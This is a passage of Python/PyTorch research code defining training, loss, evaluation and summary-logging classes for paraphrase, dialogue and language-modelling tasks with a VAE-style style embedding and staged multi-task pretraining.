name="UnsupervisedTask" + name_suffix, dataset_fun=dataset_fun) self.loss_module = self.model.get_loss_module() self.switch_rate = 1.0 self.VAE_loss_scaling = get_param_val(model_params, "VAE_loss_scaling", 1.0) self.cosine_loss_scaling = get_param_val(model_params, "cosine_loss_scaling", 0.0) self.loss_module_UNK = nn.NLLLoss(ignore_index=-1, reduction='none') self.summary_dict = {"loss_rec": list(), "loss_UNK": list(), "loss_VAE": list(), "loss_cosine": list(), "loss_combined": list(), "loss_UNK_precision": list(), "loss_UNK_recall": list(), "acc_UNK": list(), "style_mu": list(), "style_sigma": list(), "UNK_word_dist": list()} def _load_datasets(self): self._get_datasets_from_handler() self.gen_batch = self.val_dataset.get_random_batch(4, toTorch=False, label_lengths=True, noun_mask=True, mask_prob=0.0) self.val_dataset.reset_index() self.id2word = get_id2word_dict() self.generated_before = False def _get_datasets_from_handler(self): raise NotImplementedError def _get_sents_of_batch(self, batch): context_words, context_lengths, template_words, template_lengths, par_2_words, par_2_lengths, template_masks, context_masks, par_2_masks = batch max_fun = np.max if isinstance(template_lengths[DATA_GLOVE], np.ndarray) else torch.max if template_words[DATA_GLOVE] is not None and max_fun(template_lengths[DATA_GLOVE]) > 0: par_1_words = template_words par_1_lengths = template_lengths par_1_masks = template_masks elif context_words[DATA_GLOVE] is not None and max_fun(context_lengths[DATA_GLOVE]) > 0: par_1_words = context_words par_1_lengths = context_lengths par_1_masks = context_masks else: print("[!] ERROR: Template and context words are None") sys.exit(1) return par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks def train_step(self, batch_size, loop_dataset=True, iteration=0): assert self.train_dataset is not None, "[!] ERROR: Training dataset not loaded. Please load the dataset beforehand for training." par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks = self._get_sents_of_batch(self.train_dataset.get_batch(batch_size, loop_dataset=loop_dataset, toTorch=True, label_lengths=True, noun_mask=True, mask_prob=0.2)) current_tf_ratio = self._get_tf_ratio(iteration) use_tf = (random() < current_tf_ratio) if par_1_words is not None and par_1_lengths is not None: par_1_res, par_2_res, par_1_embeds, par_2_embeds = self.model((par_1_words, par_1_lengths, par_1_masks[1], par_2_words, par_2_lengths, par_2_masks[1]), teacher_forcing=use_tf, switch_rate=self.switch_rate) par_1_words = par_1_words[DATA_GLOVE] loss_1, loss_UNK_1, loss_VAE_1, acc_1, acc_UNK_1 = self._calculate_loss(par_1_res, par_1_words, par_1_masks[1], par_1_embeds) loss_2, loss_UNK_2, loss_VAE_2, acc_2, acc_UNK_2 = self._calculate_loss(par_2_res, par_2_words, par_2_masks[1], par_2_embeds) loss_UNK_recall_1, loss_UNK_precision_1 = self._calculate_UNK_loss_metrics(par_1_res[1], par_1_res[3], par_1_masks[1]) loss_UNK_recall_2, loss_UNK_precision_2 = self._calculate_UNK_loss_metrics(par_2_res[1], par_2_res[3], par_2_masks[1]) loss = (loss_1 + loss_2) / 2.0 loss_UNK = (loss_UNK_1 + loss_UNK_2) / 2.0 loss_UNK_recall = (loss_UNK_recall_1 + loss_UNK_recall_2) / 2.0 loss_UNK_precision = (loss_UNK_precision_1 + loss_UNK_precision_2) / 2.0 loss_VAE = (loss_VAE_1 + loss_VAE_2) / 2.0 loss_cos = (1 - F.cosine_similarity(par_1_embeds[0], par_2_embeds[0], dim=-1)).mean() acc = (acc_1 + acc_2) / 2.0 acc_UNK = (acc_UNK_1 + acc_UNK_2) / 2.0 else: #FIX RECONSTRUCTION par_res, par_embeds = self.model.reconstruct((par_2_words, par_2_lengths), teacher_forcing=use_tf) loss, loss_UNK, loss_VAE, acc, acc_UNK = self._calculate_loss(par_res, par_2_words, par_2_masks[0], par_embeds) loss_cos = torch.zeros(size=(1,)) loss_UNK_recall, loss_UNK_precision = self._calculate_UNK_loss_metrics(par_res[1], par_res[3], par_2_masks[0]) # (loss_UNK_recall + loss_UNK_precision) / 2.0 final_loss = loss + loss_UNK + loss_UNK_recall + loss_UNK_precision + loss_VAE * self.VAE_loss_scaling + loss_cos * self.cosine_loss_scaling self.summary_dict["loss_rec"].append(loss.item()) self.summary_dict["loss_UNK"].append(loss_UNK.item()) self.summary_dict["loss_UNK_recall"].append(loss_UNK_recall.item()) self.summary_dict["loss_UNK_precision"].append(loss_UNK_precision.item()) self.summary_dict["loss_VAE"].append(loss_VAE.item()) self.summary_dict["loss_cosine"].append(loss_cos.item()) self.summary_dict["acc_UNK"].append(acc_UNK.item()) self.summary_dict["loss_combined"].append(final_loss.item()) for dict_key, hist_tensors in zip(["UNK_word_dist", "style_mu", "style_sigma"], [[par_1_res[1][:,:,0], par_2_res[1][:,:,0]], [par_1_embeds[1], par_2_embeds[1]], [par_1_embeds[2], par_2_embeds[2]]]): new_vals = [t.detach().cpu().contiguous().view(-1).numpy().tolist() for t in hist_tensors] new_vals = [e for sublist in new_vals for e in sublist] self.summary_dict[dict_key].append(new_vals) while len(self.summary_dict[dict_key]) > 10: del self.summary_dict[dict_key][0] return final_loss, acc def _calculate_loss(self, par_res, batch_labels, par_masks, par_embeds): par_word_dist, UNK_word_dist, _, _ = par_res par_masks = par_masks[:,1:].contiguous() # First token is SOS # Remove unknown word labels from the loss if (batch_labels[:,0] == get_SOS_index()).byte().all(): batch_labels = batch_labels[:,1:] unknown_label = (batch_labels == get_UNK_index()).long() batch_labels = batch_labels * (1 - unknown_label) + (-1) * unknown_label ## Loss reconstruction loss = self.loss_module(par_word_dist.view(-1, par_word_dist.shape[-1]), batch_labels.view(-1)) UNK_word_dist = torch.log(UNK_word_dist + (UNK_word_dist == 0).float()) loss_UNK = self.loss_module_UNK(UNK_word_dist.view(-1, UNK_word_dist.shape[-1]), par_masks.view(-1)) loss_UNK[torch.isnan(loss_UNK)] = 0 loss_UNK = loss_UNK * (par_masks.view(-1) >= 0).float() loss_UNK = (1 + (par_masks.view(-1) > 0).float()*5.0) * loss_UNK loss_UNK = loss_UNK.sum() / (par_masks >= 0).float().sum() ## Accuracy calculation _, pred_labels = torch.max(par_word_dist, dim=-1) acc = torch.sum(pred_labels == batch_labels).float() / torch.sum(batch_labels != -1).float() _, pred_UNK = torch.max(UNK_word_dist, dim=-1) acc_UNK = torch.sum((pred_UNK == par_masks) & (pred_UNK > 0)).float() / (torch.sum(par_masks > 0).float() + 1e-10) ## Loss VAE regularization semantic_embed, style_mu, style_std = par_embeds loss_VAE = torch.mean(- torch.log(style_std) + (style_std ** 2 - 1 + style_mu ** 2) / 2) return loss, loss_UNK, loss_VAE, acc, acc_UNK def _calculate_UNK_loss_metrics(self, UNK_word_dist, par_lengths, par_masks): par_masks = par_masks[:,1:].contiguous() # First token is SOS par_masks_recall = torch.max(par_masks - 1, par_masks.new_zeros(size=par_masks.shape)-1) UNK_word_dist_recall = UNK_word_dist[:,:,1:].contiguous() loss_UNK_recall = self.loss_module_UNK(UNK_word_dist_recall.view(-1, UNK_word_dist_recall.shape[-1]), par_masks_recall.view(-1)) # print("Par masks: %s" % str(par_masks_recall[:,:4])) # print("UNK word dist recall: %s" % str(UNK_word_dist_recall[:,:4,:])) # print("Loss UNK recall: %s" % str(loss_UNK_recall)) UNK_labels_one_hot = UNK_word_dist.new_zeros(size=UNK_word_dist.shape) UNK_labels_one_hot = UNK_labels_one_hot.scatter(2, (par_masks + (par_masks == -1).long())[:,:,None], 1) UNK_labels_one_hot = UNK_labels_one_hot[:,:,1:] valid_UNKs = (UNK_labels_one_hot.sum(dim=1) > 0.0).float() loss_UNK_recall_manual = - torch.log(UNK_word_dist_recall * UNK_labels_one_hot + (1 - UNK_labels_one_hot)).sum() / UNK_labels_one_hot.sum() # print("Loss UNK recall manual: %s" % str(loss_UNK_recall_manual)) PREC_THRESHOLD = 0.1 UNK_precision_sum = (torch.max(torch.zeros_like(UNK_word_dist_recall)+PREC_THRESHOLD, UNK_word_dist_recall * (1 - UNK_labels_one_hot)) - PREC_THRESHOLD).sum(dim=1) / par_lengths.float().view(-1, 1) loss_UNK_precision = - torch.log(1 / (1 + UNK_precision_sum)).sum() / valid_UNKs.sum() return loss_UNK_recall_manual, loss_UNK_precision def _eval_batch(self, batch): par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks = self._get_sents_of_batch(batch) eval_swr = (1.0 if self.switch_rate > 0.0 else 0.0) p1_res, p2_res, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks[int(eval_swr)], par_2_words, par_2_lengths, par_2_masks[int(eval_swr)]), teacher_forcing=True, switch_rate=eval_swr) p1_perplexity_probs, _, _, _ = p1_res p2_perplexity_probs, _, _, _ = p2_res p1_res_tf, p2_res_tf, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks[int(eval_swr)], par_2_words, par_2_lengths, par_2_masks[int(eval_swr)]), teacher_forcing=False, switch_rate=eval_swr) _, _, p1_generated_words, p1_generated_lengths = p1_res_tf _, _, p2_generated_words, p2_generated_lengths = p2_res_tf p1_perplexity_probs = p1_perplexity_probs.detach() p1_generated_words = p1_generated_words.detach() p1_generated_lengths = p1_generated_lengths.detach() p2_perplexity_probs = p2_perplexity_probs.detach() p2_generated_words = p2_generated_words.detach() p2_generated_lengths = p2_generated_lengths.detach() # Remove unknown word labels from the evaluation batch_labels = par_2_words # [DATA_GLOVE] if (batch_labels[:,0] == get_SOS_index()).byte().all(): batch_labels = batch_labels[:,1:] unknown_label = (batch_labels == get_UNK_index()).long() batch_labels = batch_labels * (1 - unknown_label) + (-1) * unknown_label return batch_labels, p2_perplexity_probs, p2_generated_words, p2_generated_lengths # batch_labels, perplexity_probs, generated_words, generated_lengths def eval(self, dataset=None, batch_size=64): return super().eval(dataset=dataset, batch_size=batch_size, label_lengths=True, noun_mask=True) def add_summary(self, writer, iteration): # TODO: Add some example generations here. Either run the model again for some random sentences, or save last training sentences writer.add_scalar("train_%s/teacher_forcing_ratio" % (self.name), self._get_tf_ratio(iteration), iteration) for key, val in self.summary_dict.items(): if not isinstance(val, list): writer.add_scalar("train_%s/%s" % (self.name, key), val, iteration) self.summary_dict[key] = 0.0 elif len(val) == 0: continue elif not isinstance(val[0], list): writer.add_scalar("train_%s/%s" % (self.name, key), mean(val), iteration) self.summary_dict[key] = list() else: val = [v for sublist in val for v in sublist] writer.add_histogram("train_%s/%s" % (self.name, key), np.array(val), iteration) self.summary_dict[key] = list() if iteration % 1 == 0: gen_list = self.generate_examples() for i in range(len(gen_list)): if not self.generated_before: writer.add_text(self.name + "_gen%i_input_phrase" % (i), gen_list[i][0], iteration) writer.add_text(self.name + "_gen%i_input_labels" % (i), gen_list[i][1], iteration) writer.add_text(self.name + "_gen%i_reconstructed_phrase" % (i), gen_list[i][2], iteration) writer.add_text(self.name + "_gen%i_reconstructed_phrase_tf" % (i), gen_list[i][3], iteration) gen_list = self.generate_random_style_samples() for i in range(len(gen_list)): if not self.generated_before: writer.add_text(self.name + "_samp%i_input_phrase" % (i), gen_list[i][0], iteration) for j in range(len(gen_list[i][1])): writer.add_text(self.name + "_samp%i_sample_%i" % (i, j), gen_list[i][1][j], iteration) self.generated_before = True @staticmethod def batch_to_torch(batch): new_batch = [] for b in batch: if isinstance(b, dict): new_element = dict() for key in b.keys(): new_element[key] = torch.LongTensor(b[key]).to(get_device()) if b[key] is not None else None elif isinstance(b, list): new_element = [torch.LongTensor(b_e).to(get_device()) for b_e in b] elif isinstance(b, tuple): new_element = tuple([torch.LongTensor(b_e).to(get_device()) for b_e in b]) elif b is None: new_element = None else: new_element = torch.LongTensor(b).to(get_device()) new_batch.append(new_element) return tuple(new_batch) def generate_examples(self): self.model.eval() # 1.) Put data on GPU batch_torch = UnsupervisedTask.batch_to_torch(self.gen_batch) eval_swr = (1.0 if self.switch_rate > 0.0 else 0.0) # 2.) Push data through network par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks = self._get_sents_of_batch(batch_torch) # self.train_dataset.get_batch(batch_size, loop_dataset=loop_dataset, toTorch=True, label_lengths=True) with torch.no_grad(): par_1_res, par_2_res, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks[int(eval_swr)], par_2_words, par_2_lengths, par_2_masks[int(eval_swr)]), teacher_forcing=False, switch_rate=eval_swr) par_1_res_tf, par_2_res_tf, _, _ = self.model((par_1_words, par_1_lengths, par_1_masks[int(eval_swr)], par_2_words, par_2_lengths, par_2_masks[int(eval_swr)]), teacher_forcing=True, switch_rate=eval_swr) del batch_torch # 3.) Reconstruct generated answer and input generated_paraphrases = list() generated_paraphrases_tf = list() input_phrases = list() input_labels = list() gen_par_1_UNKdist = par_1_res[1].cpu().numpy() gen_par_1_words = par_1_res[2].cpu().numpy() gen_par_1_lengths = par_1_res[3].cpu().numpy() gen_par_2_UNKdist = par_1_res[1].cpu().numpy() gen_par_2_words = par_2_res[2].cpu().numpy() gen_par_2_lengths = par_2_res[3].cpu().numpy() gen_par_1_words_tf = par_1_res_tf[2].cpu().numpy() gen_par_1_lengths_tf = par_1_res_tf[3].cpu().numpy() gen_par_2_words_tf = par_2_res_tf[2].cpu().numpy() gen_par_2_lengths_tf = par_2_res_tf[3].cpu().numpy() par_1_words, par_1_lengths, par_1_masks, par_2_words, par_2_lengths, par_2_masks = self._get_sents_of_batch(self.gen_batch) par_1_words, par_1_lengths = par_1_words[DATA_GLOVE], par_1_lengths[DATA_GLOVE] for embeds, lengths, list_to_add, UNK_dist in zip([par_1_words, par_2_words, par_1_words if eval_swr == 0.0 else par_2_words, par_2_words if eval_swr == 0.0 else par_1_words, gen_par_1_words, gen_par_2_words, gen_par_1_words_tf, gen_par_2_words_tf], [par_1_lengths, par_2_lengths, par_1_lengths if eval_swr == 0.0 else par_2_lengths, par_2_lengths if eval_swr == 0.0 else par_1_lengths, gen_par_1_lengths, gen_par_2_lengths, gen_par_1_lengths_tf, gen_par_2_lengths_tf], [input_phrases, input_phrases, input_labels, input_labels, generated_paraphrases, generated_paraphrases, generated_paraphrases_tf, generated_paraphrases_tf], [None, None, None, None, gen_par_1_UNKdist, gen_par_2_UNKdist, None, None]): for batch_index in range(embeds.shape[0]): p_words = list() if len(lengths.shape) == 1: for word_index in range(lengths[batch_index]): p_words.append(self.id2word[embeds[batch_index, word_index]]) # if UNK_dist is not None: # p_words.append("{%i,%3.1f}" % (np.argmax(UNK_dist[batch_index,word_index]), 100.0*UNK_dist[batch_index,word_index,0])) sents = "[%i] " % (lengths[batch_index]) + " ".join(p_words) else: lengths = np.reshape(lengths, [lengths.shape[0], -1]) for sent_index in range(lengths.shape[1]): s_words = ["[%i] " % (lengths[batch_index, sent_index])] for word_index in range(lengths[batch_index, sent_index]): s_words.append(self.id2word[embeds[batch_index, sent_index, word_index]]) # if UNK_dist is not None: # p_words.append("{%i,%3.1f}" % (np.argmax(UNK_dist[batch_index,sent_index,word_index]), 100.0*UNK_dist[batch_index,sent_index,word_index,0])) p_words.append(" ".join(s_words)) sents = p_words list_to_add.append(sents) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, input_labels, generated_paraphrases, generated_paraphrases_tf)) self.model.train() return gen_list def generate_random_style_samples(self): self.model.eval() # 1.) Put data on GPU batch_torch = UnsupervisedTask.batch_to_torch(self.gen_batch) _, _, _, par_words, par_lengths, par_masks = self._get_sents_of_batch(batch_torch) with torch.no_grad(): _, _, gen_par_words, gen_par_lengths = self.model.sample_reconstruction_styles((par_words, par_lengths, par_masks[0]), num_samples=8) del batch_torch # 3.) Reconstruct generated answer and input generated_paraphrases = list() input_phrases = list() gen_par_words = gen_par_words.cpu().numpy() gen_par_lengths = gen_par_lengths.cpu().numpy() par_words = self.gen_batch[4] par_lengths = self.gen_batch[5] for embeds, lengths, list_to_add in zip([par_words, gen_par_words], [par_lengths, gen_par_lengths], [input_phrases, generated_paraphrases]): for batch_index in range(embeds.shape[0]): p_words = list() if len(lengths.shape) == 1: for word_index in range(lengths[batch_index]): p_words.append(self.id2word[embeds[batch_index, word_index]]) sents = "[%i] " % (lengths[batch_index]) + " ".join(p_words) else: lengths = np.reshape(lengths, [lengths.shape[0], -1]) for sent_index in range(lengths.shape[1]): s_words = ["[%i] " % (lengths[batch_index, sent_index])] for word_index in range(lengths[batch_index, sent_index]): s_words.append(self.id2word[embeds[batch_index, sent_index, word_index]]) p_words.append(" ".join(s_words)) sents = p_words list_to_add.append(sents) # 5.) Put everything in a nice format gen_list = list(zip(input_phrases, generated_paraphrases)) self.model.train() return gen_list class LanguageModelingTask(UnsupervisedTask): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix="", switch_rate=0.0, dataset_fun=DatasetHandler.load_LM_Dialogue_datasets): super(LanguageModelingTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, dataset_fun=dataset_fun) self.name = "LanguageModeling" + self.train_dataset.dataset_name.replace(" ","_") self.switch_rate = switch_rate self.cosine_loss_scaling = 0.0 def _get_datasets_from_handler(self): self.train_dataset, self.val_dataset, self.test_dataset = self.dataset_fun(debug_dataset=self.debug) class DialogueModelingTask(UnsupervisedTask): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix="", switch_rate=0.5, dataset_fun=DatasetHandler.load_LM_Dialogue_datasets): super(DialogueModelingTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, dataset_fun=dataset_fun) self.name = "DialogueModeling" + self.train_dataset.dataset_name.replace(" ","_") self.switch_rate = 0.0 self.binary_switch_rate = 0.5 self.cosine_loss_scaling = 0.0 def _get_datasets_from_handler(self): self.train_dataset, self.val_dataset, self.test_dataset = self.dataset_fun(debug_dataset=self.debug) def train_step(self, batch_size, loop_dataset=True, iteration=0): assert self.train_dataset is not None, "[!] ERROR: Training dataset not loaded. Please load the dataset beforehand for training." quest_words, quest_lengths, quest_masks, answ_words, answ_lengths, answ_masks = self._get_sents_of_batch(self.train_dataset.get_batch(batch_size, loop_dataset=loop_dataset, toTorch=True, label_lengths=True, noun_mask=True, mask_prob=0.2)) current_tf_ratio = self._get_tf_ratio(iteration) use_tf = (random() < current_tf_ratio) switch_factor = (random() < self.binary_switch_rate) if switch_factor: answ_res, quest_embeds = self.model.question_answer_switch((quest_words, quest_lengths, quest_masks[0], answ_words, answ_lengths, answ_masks[0]), teacher_forcing=use_tf) loss, loss_UNK, loss_VAE, acc, acc_UNK = self._calculate_loss(answ_res, answ_words, answ_masks[0], quest_embeds) else: quest_res, quest_embeds = self.model.reconstruct((quest_words, quest_lengths, quest_masks[0]), teacher_forcing=use_tf) answ_res, answ_embeds = self.model.reconstruct((answ_words, answ_lengths, answ_masks[0]), teacher_forcing=use_tf) quest_words = quest_words[DATA_GLOVE] loss_quest, loss_UNK_quest, loss_VAE_quest, acc_quest, acc_UNK_quest = self._calculate_loss(quest_res, quest_words, quest_masks[0], quest_embeds) loss_answ, loss_UNK_answ, loss_VAE_answ, acc_answ, acc_UNK_answ = self._calculate_loss(answ_res, answ_words, answ_masks[0], answ_embeds) ANSW_FAC = 2.0 / 3.0 QUEST_FAC = 1 - ANSW_FAC loss = loss_quest * QUEST_FAC + loss_answ * ANSW_FAC loss_VAE = loss_VAE_quest * QUEST_FAC + loss_VAE_answ * ANSW_FAC loss_UNK = loss_UNK_quest * QUEST_FAC + loss_UNK_answ * ANSW_FAC acc = acc_quest * QUEST_FAC + acc_answ * ANSW_FAC acc_UNK = acc_UNK_quest * QUEST_FAC + acc_UNK_answ * ANSW_FAC final_loss = loss + loss_UNK + loss_VAE * self.VAE_loss_scaling self.summary_dict["loss_rec"].append(loss.item()) self.summary_dict["loss_UNK"].append(loss_UNK.item()) self.summary_dict["loss_VAE"].append(loss_VAE.item()) self.summary_dict["acc_UNK"].append(acc_UNK.item()) self.summary_dict["loss_combined"].append(final_loss.item()) for dict_key, hist_tensors in zip(["UNK_word_dist", "style_mu", "style_sigma"], [[answ_res[1][:,:,0]], [quest_embeds[1]], [quest_embeds[2]]]): new_vals = [t.detach().cpu().contiguous().view(-1).numpy().tolist() for t in hist_tensors] new_vals = [e for sublist in new_vals for e in sublist] self.summary_dict[dict_key].append(new_vals) while len(self.summary_dict[dict_key]) > 10: del self.summary_dict[dict_key][0] return final_loss, acc class ParaphraseTask(UnsupervisedTask): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix="", switch_rate=0.8, dataset_fun=DatasetHandler.load_Microsoft_Video_Description_datasets): super(ParaphraseTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, dataset_fun=dataset_fun) self.name = "ParaphraseTask" + self.train_dataset.dataset_name.replace(" ","_") self.switch_rate = switch_rate def _get_datasets_from_handler(self): self.train_dataset, self.val_dataset, self.test_dataset = self.dataset_fun(debug_dataset=self.debug) class PretrainingTask(TaskTemplate): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix=""): super(PretrainingTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, name="PretrainingTask" + name_suffix) if not debug: self.tasks = [ DialogueModelingTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_LM_Dialogue_datasets), ParaphraseTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Microsoft_Video_Description_datasets, switch_rate=0.75), ParaphraseTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Quora_Paraphrase_datasets, switch_rate=0.6), ParaphraseTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Wikipedia_Paraphrase_datasets, switch_rate=0.75) ] self.task_frequency = [ 0.2, 0.1, 0.4, 0.3 ] else: self.tasks = [ ParaphraseTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Wikipedia_Paraphrase_datasets, switch_rate=0.75) # DialogueModelingTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_LM_Dialogue_datasets) ] self.task_frequency = [ 1.0 ] self._prepare_training() def _prepare_training(self): self.train_index = 0 self.train_permut_order = [] for task_index, p in enumerate(self.task_frequency): self.train_permut_order += [task_index]*int(p * 100) shuffle(self.train_permut_order) def _load_datasets(self): self.train_dataset, self.val_dataset, self.test_dataset = None, None, None def train_step(self, batch_size, loop_dataset=True, iteration=0): task_index = self.train_permut_order[self.train_index] self.train_index += 1 if self.train_index >= len(self.train_permut_order): self.train_index = 0 shuffle(self.train_permut_order) return self.tasks[task_index].train_step(batch_size=batch_size, loop_dataset=loop_dataset, iteration=iteration) def eval(self, dataset=None, batch_size=64): avg_acc = 0 detailed_metrics = {} for t_ind, t in enumerate(self.tasks): acc_t, detailed_t = t.eval(dataset=dataset, batch_size=batch_size) detailed_metrics[t.name] = detailed_t avg_acc += self.task_frequency[t_ind] * acc_t return avg_acc, detailed_metrics def add_summary(self, writer, iteration): for t in self.tasks: t.add_summary(writer, iteration) class ContextAwarePretrainingTask(TaskTemplate): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix=""): super(ContextAwarePretrainingTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, name="PretrainingTask" + name_suffix) self.tasks = [ [ ContextAwareParaphrasingTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Quora_Paraphrase_datasets) ], [ ContextAwareParaphrasingTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Quora_Paraphrase_datasets), ContextAwareLanguageModelingTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_ContextLM_Book_datasets), ContextAwareDialogueTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Dialogue_Paraphrase_datasets) ], [ ContextAwareDialogueTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Dialogue_Paraphrase_datasets), ContextAwareDialogueTask(model, model_params, load_data=load_data, debug=debug, dataset_fun=DatasetHandler.load_Dialogue_Paraphrase_Small_datasets, name_suffix="Small") ] ] freq_second_task = get_param_val(model_params, "pretraining_second_task", 0.15) self.task_frequency = [ [ 1.0 ], [ 0.3, # 0.6 0.2, # 0.4 0.5 # 0.0 ], [ 1.0 - freq_second_task, freq_second_task ] ] self.training_iterations = [ 0 if not get_param_val(model_params, "only_paraphrasing", False) else 100000, get_param_val(model_params, "pretraining_iterations", 15000) ] self.training_stage = -1 assert len(self.tasks) == len(self.task_frequency), "[!] ERROR: Both the tasks and the frequency need to be defined for the same number of training stages." assert all([len(self.tasks[i]) == len(self.task_frequency[i]) for i in range(len(self.tasks))]), "[!] ERROR: For each training stage, one frequency needs to be defined per task." assert len(self.training_iterations) == len(self.task_frequency) - 1, "[!] ERROR: A duration (number of training iterations) needs to be specified for every training stage except the last one." self._switch_training_stages() def _switch_training_stages(self): self.training_stage += 1 print("-"*75) print("Switch training stage to %i" % (self.training_stage)) print("-"*75) self.train_index = 0 self.train_permut_order = [] for task_index, p in enumerate(self.task_frequency[self.training_stage]): self.train_permut_order += [task_index]*int(p * 100) shuffle(self.train_permut_order) def _load_datasets(self): self.train_dataset, self.val_dataset, self.test_dataset = None, None, None def train_step(self, batch_size, loop_dataset=True, iteration=0): while self.training_stage < len(self.training_iterations) and \ iteration >= self.training_iterations[self.training_stage]: self._switch_training_stages() stage_iteration = iteration - (self.training_iterations[self.training_stage-1] if self.training_stage > 0 else 0) task_index = self.train_permut_order[self.train_index] self.train_index += 1 if self.train_index >= len(self.train_permut_order): self.train_index = 0 shuffle(self.train_permut_order) return self.tasks[self.training_stage][task_index].train_step(batch_size=batch_size, loop_dataset=loop_dataset, iteration=stage_iteration) def eval(self, dataset=None, batch_size=64): avg_acc = 0 detailed_metrics = {} if len(self.tasks[self.training_stage]) > 1: for t_ind, t in enumerate(self.tasks[self.training_stage]): acc_t, detailed_t = t.eval(dataset=dataset, batch_size=batch_size) detailed_metrics[t.name] = detailed_t if self.task_frequency[self.training_stage][t_ind] == max(self.task_frequency[self.training_stage]): avg_acc = acc_t return avg_acc, detailed_metrics else: return self.tasks[self.training_stage][0].eval(dataset=dataset, batch_size=batch_size) def add_summary(self, writer, iteration): for t in self.tasks[self.training_stage]: t.add_summary(writer, iteration) def finalize_summary(self, writer, iteration, checkpoint_path): for train_stage_tasks in self.tasks: for t in train_stage_tasks: t.finalize_summary(writer, iteration, checkpoint_path) def export_best_results(self, checkpoint_path, iteration): for t in self.tasks[self.training_stage]: t.export_best_results(checkpoint_path, iteration) class ContextAwareDialogueTask(TaskTemplate): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix="", dataset_fun=DatasetHandler.load_Dialogue_Paraphrase_datasets): super(ContextAwareDialogueTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, name="ContextAwareDialogueParaphrase" + name_suffix, dataset_fun=dataset_fun) self.loss_module = self.model.get_loss_module() self.switch_rate = get_param_val(model_params, "switch_rate", 0.8) self.semantic_full_dropout = get_param_val(model_params, "semantic_full_dropout", 0.0) self.semantic_full_dropout_eval = 0.0 if self.semantic_full_dropout < 1.0 else 1.0 self.KL_scheduler = create_KLScheduler(scheduler_type = get_param_val(model_params, "VAE_scheduler", 1), annealing_func_type = get_param_val(model_params, "VAE_annealing_func", 0), loss_scaling = get_param_val(model_params, "VAE_loss_scaling", 1.0), num_iters = get_param_val(model_params, "VAE_annealing_iters", 10000)) self.cosine_loss_scaling = get_param_val(model_params, "cosine_loss_scaling", 0.0) self.cosine_counter_loss = get_param_val(model_params, "cosine_counter_loss", False) self.style_loss_scaling = get_param_val(model_params, "style_loss_scaling", 1.0) self.pure_style_loss = get_param_val(model_params, "pure_style_loss", False) self.use_semantic_specific_attn = get_param_val(model_params, "use_semantic_specific_attn", False) self.loss_module_slots = nn.NLLLoss(ignore_index=-1, reduction='none') self.eval_counter = 0 # self.loss_module_style = LossStyleModule(style_size = get_param_val(model_params, "style_size", allow_default=False, error_location="ContextAwareDialogueTask - model_params"), # response_style_size = get_param_val(model_params, "response_style_size", -1)) # self.loss_module_style = LossStyleSimilarityModule(style_size = get_param_val(model_params, "style_size", allow_default=False, error_location="ContextAwareDialogueTask - model_params")) if get_param_val(model_params, "style_loss_module") == 0: self.loss_module_style = LossStylePrototypeSimilarityModule(style_size = get_param_val(model_params, "response_style_size", allow_default=False, error_location="ContextAwareDialogueTask - model_params"), stop_grads = get_param_val(model_params, "style_loss_stop_grads", False)) else: self.loss_module_style = LossStylePrototypeDistModule(style_size = get_param_val(model_params, "response_style_size", allow_default=False, error_location="ContextAwareDialogueTask - model_params"), stop_grads = get_param_val(model_params, "style_loss_stop_grads", False)) self.style_loss_scheduler = create_KLScheduler(scheduler_type=1, annealing_func_type=1, loss_scaling=self.style_loss_scaling, num_iters=get_param_val(model_params, "style_loss_annealing_iters", -1)) self.summary_dict = {"loss_rec": list(), "loss_slots": list(), "loss_VAE": list(), "loss_style": list(), "KL_scheduler": list(), "style_loss_scheduler": list(), "loss_cosine": list(), "loss_cosine_to_others": list(), "euclidean_dist": list(), "euclidean_dist_to_others": list(), "loss_combined": list(), "acc_slots": list(), "acc_style": list(), "context_style_mu": list(), "context_style_sigma": list(), "par_style_mu": list(), "par_style_sigma": list(), "slots_word_dist": list()} for proto_index in range(self.model.encoder_module.num_prototypes): self.summary_dict["proto_%i_attn" % proto_index] = list() self.summary_dict["proto_%i_context_attn" % proto_index] = list() def _load_datasets(self): self.train_dataset, self.val_dataset, self.test_dataset = self.dataset_fun(debug_dataset=self.debug, num_context_turns=get_param_val(self.model_params, "num_context_turns", 2)) self.gen_batch = self.val_dataset.get_random_batch(16 if not self.debug else 2, toTorch=False, label_lengths=True, noun_mask=True, mask_prob=0.0) self.val_dataset.reset_index() self.id2word = get_id2word_dict() self.generated_before = False def train_step(self, batch_size, loop_dataset=True, iteration=0): assert self.train_dataset is not None, "[!] ERROR: Training dataset not loaded. Please load the dataset beforehand for training." par_1_words, par_1_lengths, par_2_words, par_2_lengths, 